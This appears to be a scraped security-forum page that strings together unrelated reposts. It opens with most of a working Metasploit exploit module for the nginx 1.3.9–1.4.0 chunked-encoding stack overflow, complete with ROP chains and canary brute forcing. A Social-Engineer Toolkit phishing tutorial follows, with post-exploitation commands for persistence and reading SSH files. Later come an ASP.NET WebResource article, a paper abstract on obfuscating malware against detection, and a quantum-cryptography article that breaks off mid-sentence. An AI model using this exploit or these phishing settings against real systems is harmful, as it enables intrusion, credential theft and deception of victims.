'http://nginx.org/en/security_advisories.html'], ['URL', 'http://packetstormsecurity.com/files/121560/Nginx-1.3.9-1.4.0-Stack-Buffer-Overflow.html'] ], 'Privileged' => false, 'Payload' => { 'BadChars' => "\x0d\x0a", }, 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Targets' => [ [ 'Ubuntu 13.04 32bit - nginx 1.4.0', { 'CanaryOffset' => 5050, 'Offset' => 12, 'Writable' => 0x080c7330, # .data from nginx :dereference_got_callback => :dereference_got_ubuntu_1304, :store_callback => :store_ubuntu_1304, }], [ 'Debian Squeeze 32bit - nginx 1.4.0', { 'Offset' => 5130, 'Writable' => 0x080b4360, # .data from nginx :dereference_got_callback => :dereference_got_debian_squeeze, :store_callback => :store_debian_squeeze } ], ], 'DefaultTarget' => 0 )) register_options([ OptPort.new('RPORT', [true, "The remote HTTP server port", 80]) ], self.class) register_advanced_options( [ OptInt.new("CANARY", [false, "Use this value as stack canary instead of brute forcing it", 0xffffffff ]), ], self.class) end def peer "#{rhost}:#{rport}" end def check begin res = send_request_fixed(nil) if res =~ /^Server: nginx\/(1\.3\.(9|10|11|12|13|14|15|16)|1\.4\.0)/m return Exploit::CheckCode::Appears elsif res =~ /^Server: nginx/m return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_error("#{peer} - Connection failed") end return Exploit::CheckCode::Unknown end # # Generate a random chunk size that will always result # in a negative 64bit number when being parsed # def random_chunk_size(bytes=16) return bytes.times.map{ (rand(0x8) + 0x8).to_s(16) }.join end def send_request_fixed(data) connect request = "GET / HTTP/1.1\r\n" request << "Host: #{Rex::Text.rand_text_alpha(16)}\r\n" request << "Transfer-Encoding: Chunked\r\n" request << "\r\n" request << "#{data}" sock.put(request) res = nil begin res = sock.get_once(-1, 0.5) rescue EOFError => e # Ignore end disconnect return res end def store_ubuntu_1304(address, value) chain = [ 0x0804c415, # pop ecx ; add al, 29h ; ret address, # address 0x080b9a38, # pop eax ; ret value.unpack('V').first, # value 0x080a9dce, # mov [ecx], eax ; mov [ecx+4], edx ; mov eax, 0 ; ret ] return chain.pack('V*') end def dereference_got_ubuntu_1304 chain = [ 0x08094129, # pop esi; ret 0x080c5090, # GOT for localtime_r 0x0804c415, # pop ecx ; add al, 29h ; ret 0x001a4b00, # Offset to system 0x080c360a, # add ecx, [esi] ; adc al, 41h ; ret 0x08076f63, # push ecx ; add al, 39h ; ret 0x41414141, # Garbage return address target['Writable'], # ptr to .data where contents have been stored ] return chain.pack('V*') end def store_debian_squeeze(address, value) chain = [ 0x08050d93, # pop edx ; add al 0x83 ; ret value.unpack('V').first, # value 0x08067330, # pop eax ; ret address, # address 0x08070e94, # mov [eax] edx ; mov eax 0x0 ; pop ebp ; ret 0x41414141, # ebp ] return chain.pack('V*') end def dereference_got_debian_squeeze chain = [ 0x0804ab34, # pop edi ; pop ebp ; ret 0x080B4128 - 0x5d5b14c4, # 0x080B4128 => GOT for localtime_r; 0x5d5b14c4 => Adjustment 0x41414141, # padding (ebp) 0x08093c75, # mov ebx, edi ; dec ecx ; ret 0x08067330, # pop eax # ret 0xfffb0c80, # offset 0x08078a46, # add eax, [ebx+0x5d5b14c4] # ret 0x0804a3af, # call eax # system target['Writable'] # ptr to .data where contents have been stored ] return chain.pack("V*") end def store(buf, address, value) rop = target['Rop'] chain = rop['store']['chain'] chain[rop['store']['address_offset']] = address chain[rop['store']['value_offset']] = value.unpack('V').first buf << chain.pack('V*') end def dereference_got unless self.respond_to?(target[:store_callback]) and self.respond_to?(target[:dereference_got_callback]) fail_with(Exploit::Failure::NoTarget, "Invalid target specified: no callback functions defined") end buf = "" command = payload.encoded i = 0 while i < command.length buf << self.send(target[:store_callback], target['Writable'] + i, command[i, 4].ljust(4, ";")) i = i + 4 end buf << self.send(target[:dereference_got_callback]) return buf end def exploit data = random_chunk_size(1024) if target['CanaryOffset'].nil? data << Rex::Text.rand_text_alpha(target['Offset'] - data.size) else if not datastore['CANARY'] == 0xffffffff print_status("#{peer} - Using 0x%08x as stack canary" % datastore['CANARY']) canary = datastore['CANARY'] else print_status("#{peer} - Searching for stack canary") canary = find_canary if canary.nil? || canary == 0x00000000 fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to find stack canary") else print_good("#{peer} - Canary found: 0x%08x\n" % canary) end end data << Rex::Text.rand_text_alpha(target['CanaryOffset'] - data.size) data << [canary].pack('V') data << Rex::Text.rand_text_hex(target['Offset']) end data << dereference_got begin send_request_fixed(data) rescue Errno::ECONNRESET => e # Ignore end handler end def find_canary # First byte of the canary is already known canary = "\x00" print_status("#{peer} - Assuming byte 0 0x%02x" % 0x00) # We are going to bruteforce the next 3 bytes one at a time 3.times do |c| print_status("#{peer} - Bruteforcing byte #{c + 1}") 0.upto(255) do |i| data = random_chunk_size(1024) data << Rex::Text.rand_text_alpha(target['CanaryOffset'] - data.size) data << canary data << i.chr unless send_request_fixed(data).nil? print_good("#{peer} - Byte #{c + 1} found: 0x%02x" % i) canary << i.chr break end end end if canary == "\x00" return nil else return canary.unpack('V').first end end end Sursa: Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow ? Packet Storm

[h=1]Phishing and Social Engineering Techniques 2.0[/h]Ahmed Mohamed May 22, 2013 This is the second part of the phishing and social engineering techniques series. In the first article, we have discussed what phishing is, as well as different types of phishing. We made a demo of a phishing attack using an email spoofing method to convince our victims to click on our links, and finally we had an overview about the Social Engineering Toolkit. Today we are going to talk in detail about the social engineering toolkit configuration, which allows us to customize our configuration according to the attack scenario. So being familiar with the configuration options will give you a view about the full features of SET to use these features to launch attack against our victims to convince them to provide the attacker all information that the attacker needs for further attack. What is social engineering? According to Wikipedia: Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information. This is a type of confidence trick for the purpose of information gathering, fraud, or computer system access. It differs from traditional cons in that often the attack is often a mere step in a more complex fraud. [h=1]Social-Engineer Toolkit[/h] The Social-Engineer (SET) was created and written by David Kennedy (ReL1K) and is an open-source python-driven tool that focuses solely on attacking the weakest link in the information security chain —the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test. The Social-Engineer Toolkit(SET) is included in the latest version of the most popular Linux distribution focused on security— BackTrack. It can also be downloaded through GitHub using the following command: git clone https://github.com/trustedsec/social-engineer-toolkit/. [h=1]Social Engineering Toolkit Update[/h] The first step that we should take after installing BackTrack is updating the Social Engineering Toolkit. To do so, open the terminal and change directory to the SET directory, then enter the following command: root@bt:/pentest/exploits/set# svn update D config/set_config.py U config/set_config U config/update_config.py U setup.py A src/fasttrack/delldrac.py U src/fasttrack/mssql.py U src/powershell/powershell.py U src/core/set.py U src/core/payloadgen/create_payloads.py U src/core/setcore.py U src/core/dictionaries.py U src/core/menu/text.py U src/core/fasttrack.py U src/html/spawn.py U src/html/Signed_Update.jar.orig U src/html/unsigned/verified_sign.py U src/html/unsigned/unsigned.jar D src/webattack/java_applet U src/webattack/multi_attack/multiattack.py U src/webattack/harvester/scraper.py U src/webattack/harvester/harvester.py U src/webattack/browser_exploits/gen_payload.py D src/webattack/web_clone/linux D src/webattack/web_clone/osx A src/webattack/web_clone/applet.txt A src/webattack/web_clone/applet.database.old U src/webattack/web_clone/applet.database U src/payloads/set_payloads/shell.windows A src/payloads/set_payloads/pyinjector.binary U src/payloads/set_payloads/listener.py U set U readme/CHANGES U readme/CREDITS U readme/README Updated to revision 1599. [h=1]Social Engineering Toolkit configuration[/h] The power of SET is in its configuration file. SET using its default settings works perfectly for most users, but advanced customization will help us to make sure that the attack vectors run without problems. So after updating SET, it’s time to edit the SET configuration file. So let’s walk through it. To open SET configuration file, Open the terminal and change the directory to config folder under the SET directory, you will find the configuration file called set_config. Open it in any text editor. [TABLE] [TR] [TD=class: gutter]1 2 [/TD] [TD=class: code]### Define the path to MetaSploit, for example: /pentest/exploits/framework3 METASPLOIT_PATH=/opt/metasploit/msf3 [/TD] [/TR] [/TABLE] While looking through the configuration file, you can change any option to get the desired result. In the first option, you can change the path of where Metasploit is located. SET uses Metasploit for the payload creations, file format bugs, and for the browser exploit scenarios. By default, the Metasploit location is /opt/metasploit/msf3. [TABLE] [TR] [TD=class: gutter]1 2 [/TD] [TD=class: code]### This will tell what database to use when using the MetaSploit functionality. Default is PostgreSQL METASPLOIT_DATABASE=postgresql [/TD] [/TR] [/TABLE] In this option, you can choose which database Metasploit will use. By default, PostgresSQL is the default database. [TABLE] [TR] [TD=class: gutter]1 2 [/TD] [TD=class: code]### How many times SET should encode a payload if you are using standard MetaSploit encoding options ENCOUNT=4 [/TD] [/TR] [/TABLE] In this option, you can specify how many times Metasploit should encode the payload using the standard Metasploit encoding option. By default, it encodes four times before sending the payload. [TABLE] [TR] [TD=class: gutter]1 2 3 [/TD] [TD=class: code]### The browser, however can introduce buggy results when auto migrating. ### NOTE: This will make bypassuac not work properly. Migrate to a different process to get it to work. AUTO_MIGRATE=OFF [/TD] [/TR] [/TABLE] In this option, you can set auto_migrate option to on/off. ON means that the Meterpreter session will migrate to a different process. For example, if we got a Meterpreter session through a browser attack and the victim closed the browser, then the session will be dead. But if auto_migrate set to ON, the Meterpreter session will migrate to another running process so if the attacker closes the browser, the session is still live. [TABLE] [TR] [TD=class: gutter]1 2 3 4 [/TD] [TD=class: code]### Custom exe you want to use for Metasploit encoding, this usually has better av ### detection. Currently it is set to legit.binary which is just calc.exe. An example ### you could use would be putty.exe so this field would be /pathtoexe/putty.exe CUSTOM_EXE=legit.binary [/TD] [/TR] [/TABLE] In this option, you can determine which executable will be used for Metasploit encoding. By default, it’s set to legit.binary, which is calc.exe. [TABLE] [TR] [TD=class: gutter]1 2 3 4 [/TD] [TD=class: code]### This is for the backdoored executable if you want to keep the executable to still work. Normally ### when legit.binary is used, it will render the application useless. Specifying this will keep the ### application working BACKDOOR_EXECUTION=ON [/TD] [/TR] [/TABLE] In the next option we will determine if we want to keep the executable working. We specify this at custom_exe, which by default is calc.exe. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 [/TD] [TD=class: code]### Here we can run multiple Meterpreter scripts once a session is active. This ### may be important if we are sleeping and need to run persistence, try to elevate ### permissions and other tasks in an automated fashion. First turn this trigger on ### then configure the flags. Note that you need to separate the commands by a ; METERPRETER_MULTI_SCRIPT=OFF LINUX_METERPRETER_MULTI_SCRIPT=OFF [/TD] [/TR] [/TABLE] Here, we can run multiple Meterpreter scripts once a session is active. We can turn it off/on in the next option and specify these scripts. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 [/TD] [TD=class: code]### What commands do you want to run once a Meterpreter session has been established. ### Be sure if you want multiple commands to separate with a ;. For example you could do ### run getsystem;run hashdump;run persistence to run three different commands METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts [/TD] [/TR] [/TABLE] In this option, we can choose which commands will be run once a Meterpreter session has been established. If you want multiple commands, you can separate them with a semicolon “;”. [TABLE] [TR] [TD=class: gutter]1 2 3 4 [/TD] [TD=class: code]### This is the port that is used for the iFrame injection using the Metasploit browser attacks. ### By default this port is 8080 however egress filtering may block this. May want to adjust to ### something like 21 or 53 METASPLOIT_IFRAME_PORT=8080 [/TD] [/TR] [/TABLE] You can use this to determine which port will be used for the iFrame injection while using the Metasploit browser attacks. By default, it will use port 8080. It’s better to change it to a popular port like 2153, etc. ### Define to use Ettercap or not when using website attack only - set to ON and OFF ETTERCAP=OFF ### Ettercap home directory (needed for DNS_spoof) ETTERCAP_PATH=/usr/share/ettercap ### Specify what interface you want ettercap or DSNiff to listen on, if nothing will default ETTERCAP_INTERFACE=eth0 Ettercap is a free and open source network security tool for man in the middle attacks on a LAN. It can be used for computer network protocol analysis and security auditing. It runs on various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows. It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols. The Ettercap options can be used when an attacker is on the same subnet as his victims and he wants to perform DNS poison attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site or all sites to your malicious server. There are three options for Ettercap. The first is used to allow SET to use Ettercap, and the second sets the path, and the third is to identify the interface on which Ettercap will listen. [TABLE] [TR] [TD=class: gutter]1 2 3 [/TD] [TD=class: code]### Define to use dsniff or not when using website attack only - set to on and off ### If dsniff is set to on, ettercap will automatically be disabled. DSNIFF=OFF [/TD] [/TR] [/TABLE] Dsniff is a set of password sniffing and network traffic analysis tools written by security researcher and startup founder Dug Song to parse different application protocols and extract relevant information. Dsniff passively monitors a network for interesting data (passwords, e-mail, files, etc.) In this option, you can allow the use of dsniff by setting it On/Off but take in your mind that Ettercap will automatically be disabled. [TABLE] [TR] [TD=class: gutter]1 2 [/TD] [TD=class: code]### SendMail ON or OFF for spoofing email addresses SENDMAIL=OFF [/TD] [/TR] [/TABLE] Sendmail is a general purpose internetwork email routing facility that supports many kinds of mail-transfer and -delivery methods, including the Simple Mail Transfer Protocol (SMTP) used for email transport over the Internet. By setting sendmail flag to ON, Sendmail can spoof source email addresses. Sendmail must be installed before set it to ON. It’s installed by default in back track 5. [TABLE] [TR] [TD=class: gutter]1 2 3 4 [/TD] [TD=class: code]### Create self-signed Java applets and spoof publisher note this requires you to ### install ---> Java 6 JDK, BT5 or Ubuntu users: apt-get install openjdk-6-jdk ### If this is not installed it will not work. Can also do: apt-get install sun-java6-jdk SELF_SIGNED_APPLET=OFF [/TD] [/TR] [/TABLE] If we set this option to ON, It will allow us to sign the java applet with whatever the name that we want. For example, if we are targeting a company called “XYZ”, you can sign the java applet with “XYZ” to make it look more believable. By default the java applet is signed by Microsoft this will require you to install java’s jdk. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 [/TD] [TD=class: code]### Use Apache instead of the standard Python web server. This will increase the speed ### of the attack vector. APACHE_SERVER=OFF ### Path to the Apache web root APACHE_DIRECTORY=/var/www [/TD] [/TR] [/TABLE] If we set this option to ON, SET will use the Apache web server to handle the web requests because it will increase the speed of the attack. By default SET will use Python web server and you should set the Apache root directory —which is /var/www by default. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 [/TD] [TD=class: code]# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR WEBATTACK_SSL=OFF # PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED) # YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT # IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED! SELF_SIGNED_CERT=OFF # BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK # SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem PEM_CLIENT=/root/newcert.pem PEM_SERVER=/root/newreq.pem [/TD] [/TR] [/TABLE] If you are targeting a website that uses “HTTPS” protocol for communication, it’s better to make your website use “HTTPS” too, Fortunately SET allows you to incorporate SSL based attacks with it so you will need to turn the webattack_ssl to ON. And set the second option to ON if you want to use self-signed certificates and the third and fourth options should refer to the location of the client and server certificates. [h=1]Conclusion[/h] The Social Engineering Toolkit is a powerful tool that allows the penetration tester to use against his victims to convince his victims to provide him with the required information for further attack. SET has many features that you can customize to help you to for your attack scenario. [h=1]References[/h] www.wikipedia.com www.social-engineer.org Sursa: InfoSec Institute Resources – Phishing and Social Engineering Techniques 2.0

The ASP.NET Internals Dejan Lukan May 23, 2013 ASP.NET Configuration Options The most important configurations in the web.config file will be described in this section: <authenticaton> The authentication tag is used at the application level and is used to identify the client. There are four authentication modes we can choose from when setting this element. Those modes are the following: None, Windows, Forms, Passport. If we don’t need any authentication, we can simply set the authentication mode to none. We can also use Windows authentication mode if we would like IIS to handle the authentication for us; in a usual scenario, the authentication credentials are sent to the IIS server, whose job is to check the validity of them and respond appropriately. The IIS gives us four standard authentication options that we can use: Anonymous, Basic, Digest and Windows integrated. Forms use web application forms to collect the user supplied username and password and validate them. With passport authentication, we’re actually using Microsoft’s Passport database to authenticate against, which is good because users don’t need to constantly re-register on various sites, but it costs a bit of money to use. Let’s take a look at the authentication tag as used by the default application, which can be created by the Visual Studio: <authentication mode=”Forms”> <forms loginUrl=”~/Account/Login.aspx” timeout=”2880? /> </authentication> We can see that we need to login with the Forms authentication mode if we’re trying to access the Account/Login.aspx website. This can be seen on the picture below, where we can clearly see that we need to input the right username and password to successfully authenticate: <authorization> The next important field is <authorization> that controls the clients’ access to the resources in the same directory. Inside this element, we can use either <allow> or <deny> elements, where both of them can be used to allow/deny access to users and resources. We can use different attributes with those two elements to give/deny the exact group of users certain permissions. The attributes are the following: - users: we can use a list of user names which we allow/deny access to certain resources, but there are also two other characters that have a special meaning. The ? character can be used to specify anonymous users, while all users are specified with the * character. - roles: we can specify a list of roles which are allowed/denied to access certain resource. - verbs: we can specify a list of HTTP methods to which the access is allowed/denied. Let’s take a look at the default Visual Studio application’s Account/directory that contains the following web.config configuration file: <?xml version="1.0"?> <configuration> <location path="Register.aspx"> <system.web> <authorization> <allow users="*"/> </authorization> </system.web> </location> <system.web> <authorization> <deny users="?"/> </authorization> </system.web> </configuration> In the above configuration, we’re specifying that all users are allowed access to the Register.aspx resource, while by default anonymous users are not allowed to access anything else. <compilation> The compilation element is used to define the compiler settings. There are a number of attributes that we can use with the compilation element, but the following are the most useful: - debug: specifies if the debugging information should be printed to web browser. - defaultLanguage: specifies in which language the application was written in. - targetFramework: specifies the ASP.NET target framework which is used to compile the application. Let’s take a look at the default Visual Studio application that contains the following <compilation> settings: <compilation debug="true" targetFramework="4.0" /> We’ve asked the application to print debugging information and telling it that it was compiled for the 4.0 ASP.NET target framework. We can also see this information in the project’s properties under the Application > Target framework setting. ScriptResource and WebResource From Microsoft ASP.NET 2.0, we can embed static files, like html files, css files, image files and scripts in assembly as .resources. But then we need a handle to access those resources, which is exactly what the WebResource.axd provides. This is why the WebResource.axd file is used to retrieve assembly resources and send them as a response to the request in a web browser. When we send a request to the WebResource.axd, the handler will look up the web resource identifier and try to load the assembly that contains the resource. If successful, it will get the data from the .resource assembly and send it to the client. The URL for WebResource.axd looks like this: WebResource.axd?d=<encrypted_id>&t=<time_stamp> The d parameter is used as an ID to request the resource we want, while the t parameter is the time stamp that is used to check whether the resource has changed from when it was last requested. The question arises: why would we even want to use WebResource.axd, when we can simply serve static files normally? The answer is that we can deploy web applications easier and faster because we need to deploy a smaller number of files, not to mention that we need to maintain them. Let’s take a look at the current default Visual Studio application’s files as they appear in the Solution Explorer; this can be seen on the picture below: We can see that we’re using a number of static files like jquery.js files, as well as the Site.css style sheet. To use WebResources.axd instead, we need to create a new directory called Resources/ at the document root of the web application (actually we can name the folder anything we want, but let’s just name it Resources as advised). Right click on the project and select Add New Folder and name the folder Resources. The project tree will now look like presented on the picture below: Notice that the Resources folder has been added to the list. After that, we need to add some static files to the Resources directory. We can do that by simply dragging and dropping; we’ll drag each jsquery.js script as well as the Site.css files to the newly created Resources directory. After that, the Scripts and Styles directories are not needed anymore and we can delete them. The new project’s tree structure now looks like this: If we try to restart the web page now, it shouldn’t load correctly, since we moved the css style sheet file. On the picture below, we can see that this is indeed true, because the css style sheet wasn’t read by the website, since it’s not available in the previous location anymore: If we look at the source code of the web page, we can see that it’s trying to access the Styles/Site.css CSS file, but obviously it can’t, since the web page doesn’t have any style applied to it. But let’s nevertheless try to access that file to check whether it’s available or not. On the picture below, we can clearly see that the Site.css file is unreachable. So we just proved that if we move the Site.css style sheet file to some other directory, the application won’t find it and the web page will not be able to load it; this isn’t exactly something new or hard to understand, but we’re doing it because we want to make a point that if we remove the Site.css now, the site won’t be able to use it, but we’ll later add it by using the WebResource.axd and that’s when the site should look like it did at the beginning, with the style sheet applied. So the first thing we need to do is to prepare the web resources that we’ve just added to the Resources directory. We need to select all of the files in there and right-click on them, then select Properties. The following windows should open: Clearly we can see that the Build Action is the setting we need to change. Notice at the bottom of the picture where it says that the Build Action option specifies how the file should be built and deployed. Currently the field holds a value Content, because each file we selected has this option set; remember that the files are loaded normally now, by linking to them in the HTML as follows: <link href="Styles/Site.css" rel="stylesheet" type="text/css" /> We need to change the Build Action to “Embedded Resource”, as can be seen on the picture below: Next, we need to register the resources as WebResource; we can do that with the WebResource attribute. We can place it in any .cs file, but it wouldn’t be very good if we would have web resources registered in various places. For this reason, it’s best to register all files in the Properties/AssemblyInfo.cs file by using the WebResource attribute. The syntax for registering resources as WebResource in any .cs file is as follows: [assembly: WebResource("webresource_name", "content_type")] The webresource_name is the name of the resource that we’re trying to embed in the assembly. The content_type is the MIME type of the resource. First we need to put the following line on the top of the AssemblyInfo.cs to enable the use of the WebResource: using System.Web.UI; After that, we can register the resources normally with the WebResource. To register all previously moved static files we can write something like the following code and add it at the end of the AssemblyInfo.cs file: /* * Web Resources */ [assembly: WebResource("WebApplication1.Resources.Site.css", "text/css")] [assembly: WebResource("WebApplication1.Resources.jquery-1.4.1-vsdoc.js", "text/javascript")] [assembly: WebResource("WebApplication1.Resources.jquery-1.4.1.js", "text/javascript")] [assembly: WebResource("WebApplication1.Resources.jquery-1.4.1.min.js", "text/javascript")] Notice that the name of the resources is comprised with the project name, which is WebApplication1, followed by the folder name Resources where they are located, followed by the actual name of each resource. The second argument is the MIME type of each resource that is sent as a Content-Type HTTP header in a response and may be used by the web browser in various ways. We used the “text/css” MIME type for style sheets, while the JavaScript files use the “text/javascript” MIME type. We’ve just registered our added resources as web resources, but we still have to get the URL of each resource to be able to access them. We already said that before the web page used the following code to request the resource, which is then downloaded and applied to the web page. <link href="Styles/Site.css" rel="stylesheet" type="text/css" /> This wouldn’t work now, however, since the resources have been relocated to some other file and it’s not defined as a Content resource anymore, but as an EmbeddedResource. This is why we need to access it differently, with the use of the WebResource.axd script that accepts the d parameter, which is the ID of the resource we would like to access. But how do we get the value of the d parameter, which is needed to access the resource? This can be done by calling the GetWebResourceUrl function that accepts two arguments: the first argument specifies the type of the server-side resource and a resource name. To use this method, we must first create the instance of the ClientScriptManager class to which the function belongs. We can put that in the Default.aspx.cs file, which can then look like this: namespace WebApplication1 { public partial class _Default : System.Web.UI.Page { void Page_Init(object sender, EventArgs e) { ClientScriptManager cs = Page.ClientScript; HtmlLink myHtmlLink = new HtmlLink(); myHtmlLink.Href = cs.GetWebResourceUrl(typeof(SiteMaster), "WebApplication1.Resources.Site.css"); cs.RegisterClientScriptResource(typeof(SiteMaster), "WebApplication1.Resources.Site.css"); myHtmlLink.Attributes.Add("rel", "stylesheet"); Page.Header.Controls.Add(myHtmlLink); string[] resourceNames = Assembly.GetExecutingAssembly().GetManifestResourceNames(); foreach (string res in resourceNames) { Debug.WriteLine("Resource name: "+res); } } } } We loaded the “WebApplication1.Resources.Site.css” CSS resource and added it to the header of the web page. At the end of the function, we’re also printing all the resources to verify if they got loaded successfully. If we run the application now, we should see that the CSS file is indeed loaded and working. We’ve just used the WebResource.axd to get access to our CSS resource file; we won’t repeat the steps for the JavaScript files, because they are primarily the same. If there are any problems loading the resource files, we can download Reflector, that’s accessible here: .NET Reflector - Understand and debug any .NET code, and look inside the generated DLL files located in the bin/ directory of the application. The .NET Reflector looks like the picture below: If we look at the WebApplication1, we can clearly see that the path to the resources is correct, as can also be seen on the picture below: If the resources are still not loaded correctly, there’s a nice tip here: asp.net - WebResource Hell - resource cannot be found - Stack Overflow It suggests that we should call GetWebResourceUrl function with the type of our .master file. In our case, the master file contains the class SiteMaster, which we should use as the first parameter to the GetWebResourceUrl function. After that, everything should work just fine. Let’s verify that the CSS files have indeed been loaded successfully. On the picture below we can see that we’ve accessed the CSS file through the WebResource.axd and that the CSS is actually visible and being read correctly. We can see that we can successfully get our hands on the resources with using the WebResource.axd, which is located at document root, according to the URIs in the source of a web page. However, there isn’t actually a WebResource.axd file in the document root of the application; this is because .axd files are implemented as HTTP handlers, so they don’t exist as an ASP.NET web page. If we look at the web.config configuration file accessible in C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\Config directory, we can see the following, which directly relates to our WebResource.axd handler: <add path="WebResource.axd" verb="GET" type="System.Web.Handlers.AssemblyResourceLoader" validate="True" /> If a request comes from to the WebResource.axd, use the AssemblyResourceLoader HTTP handler to handle the request. This fully explains that the WebResource.axd file is just a HTTP handler implemented by the .NET framework to take requests and return the resources from the assembled files. Conclusion We’ve seen how we can embed static files inside the compiler assembly file, which enabled us to have every static resource available in a single file. This was a more complete introduction to the WebResource.axd and ASP.NET, and this is the basis to understanding the Oracle Padding attack. Sursa: InfoSec Institute Resources – The ASP.NET Internals

Advanced Cryptography Description: In this video Bill Buchanan talks about Advanced Cryptography so he is going to cover topics like, Fundamentals of Crypto, Encryption, Private Key, Passing Keys, Public Key, Private Key for ID. PKI, Hashing One Time Password, MAC, Secure Functions, etc .. He will cover almost all popular encryption method. Download Codes and PDF & tools : http://www.asecuritysite.com/Encryption Sursa: Advanced Cryptography

Dynamic Malware Analysis Description: In this video you will learn how to perform a Dynamic Malware Analysis using ollydbg tool. Dynamic Malware analysis is a very risky task because you are running that piece malware into your system and checking what exactly that malware is doing and after that you start analysis the process and connections for evidence or other use. In this video he is running a Zeus Botnet. Sursa: Dynamic Malware Analysis

Mimimorphism: A New Approach to Binary Code Obfuscation Zhenyu Wu, Steven Gianvecchio, Mengjun Xie, and Haining Wang Abstract Binary obfuscation plays an essential role in evading malware static analysis and detection. The widely used code obfuscation techniques, such as polymorphism and metamorphism, focus on evading syntax based detection. However, statistic test and semantic analysis techniques have been developed to thwart their evasion attempts. More recent binary obfuscation techniques are divided in their purposes of attacking either statistical or semantic approach, but not both. In this paper, we introduce mimimorphism, a novel binary obfuscation technique with the potential of evading both statistical and semantic detections. Mimimorphic malware uses instruction-syntax-aware high-order mimic functions to transform its binary into mimicry executables that exhibit high similarity to benign programs in terms of statistical properties and semantic characteristics. We implement a prototype of the mimimorphic engine on the Intel x86 platform, and evaluate its capability of evading statistical anomaly detection and semantic analysis detection techniques. Our experimental results demonstrate that the mimicry executables are indistinguishable from benign programs in terms of byte frequency distribution and entropy, as well as control flow fingerprint. Full paper (387 KB) appeared in Proceedings of the 17th ACM Conference on Computer and Communications Security (CCS'10). http://www.cs.wm.edu/~adamwu/Mimimorphism_CCS10/Mimimorphic.pdf Download Presentation slides (for PowerPoint 2007+, 1.12 MB) http://www.cs.wm.edu/~adamwu/Mimimorphism_CCS10/ZhenyuWu_CCS2010_Mimimorphism.pptx Experimental data 7th order 100 mimimorphic instances (bz2 tar package, 127 MB) http://www.cs.wm.edu/~hnw/Mimimorphic/MimicOrder7.tar.bz2 8th order 100 mimimorphic instances (bz2 tar package, 169 MB) http://www.cs.wm.edu/~hnw/Mimimorphic/MimicOrder8.tar.bz2 Note: These mimimorphic instances are NOT standalone executables. They are the mimimorphic payloads, which consist of sequences of mimicry instructions that encode a piece of randomized data. In a standalone mimimorphic executable, if we were to make one, each piece of payload will be merged with the decoder binary and put into the ".text" section of the executable. Maintained by: Zhenyu Wu Last modified: Mon Apr 30 18:16:22 EDT 2012 Sursa: Mimimorphism: A New Approach to Binary Code Obfuscation

[h=2]Cryptography[/h] [h=3]The solace of quantum[/h][h=1]Eavesdropping on secret communications is about to get harder[/h] May 25th 2013 CRYPTOGRAPHY is an arms race between Alice and Bob, and Eve. These are the names cryptographers give to two people who are trying to communicate privily, and to a third who is trying to intercept and decrypt their conversation. Currently, Alice and Bob are ahead—just. But Eve is catching up. Alice and Bob are therefore looking for a whole new way of keeping things secret. And they may soon have one, courtesy of quantum mechanics. At the moment cryptography concentrates on making the decrypting part as hard as possible. The industry standard, known as RSA (after its inventors, Ron Rivest, Adi Shamir and Leonard Adleman, of the Massachusetts Institute of Technology), relies on two keys, one public and one private. These keys are very big numbers, each of which is derived from the product of the same two prime numbers. Anyone can encrypt a message using the public key, but only someone with the private key can decrypt it. To find the private key, you have to work out what the primes are from the public key. Make the primes big enough—and hunting big primes is something of a sport among mathematicians—and the task of factorising the public key to reveal the primes, though possible in theory, would take too long in practice. (About 40 quadrillion years with the primes then available, when the system was introduced in 1977.) Since the 1970s, though, the computers that do the factorisation have got bigger and faster. Some cryptographers therefore fear for the future of RSA. Hence the interest in quantum cryptography. Alice, Bob and Werner, too? The most developed form of quantum cryptography, known as quantum key distribution (QKD), relies on stopping interception, rather than preventing decryption. Once again, the key is a huge number—one with hundreds of digits, if expressed in the decimal system. Alice sends this to Bob as a series of photons (the particles of light) before she sends the encrypted message. For Eve to read this transmission, and thus obtain the key, she must destroy some photons. Since Bob will certainly notice the missing photons, Eve will need to create and send identical ones to Bob to avoid detection. But Alice and Bob (or, rather, the engineers who make their equipment) can stop that by using two different quantum properties, such as the polarities of the photons, to encode the ones and zeros of which the key is composed. According to Werner Heisenberg’s Uncertainty Principle, only one of these two properties can be measured, so Eve cannot reconstruct each photon without making errors. If Bob detects such errors he can tell Alice not to send the actual message until the line has been secured. One exponent of this approach is ID Quantique, a Swiss firm. In collaboration with Battelle, an American one, it is building a 700km (440-mile) fibre-optic QKD link between Battelle’s headquarters in Columbus, Ohio, and the firm’s facilities in and around Washington, DC. Battelle will use this to protect its own information and the link will also be hired to other firms that want to move sensitive data around. QuintessenceLabs, an Australian firm, has a different approach to encoding. Instead of tinkering with photons’ polarities, it changes their phases and amplitudes. The effect is the same, though: Eve will necessarily give herself away if she eavesdrops. Using this technology, QuintessenceLabs is building a 560km QKD link between the Jet Propulsion Laboratory in Pasadena, California, which organises many of NASA’s unmanned scientific missions, and the Ames Research Centre in Silicon Valley, where a 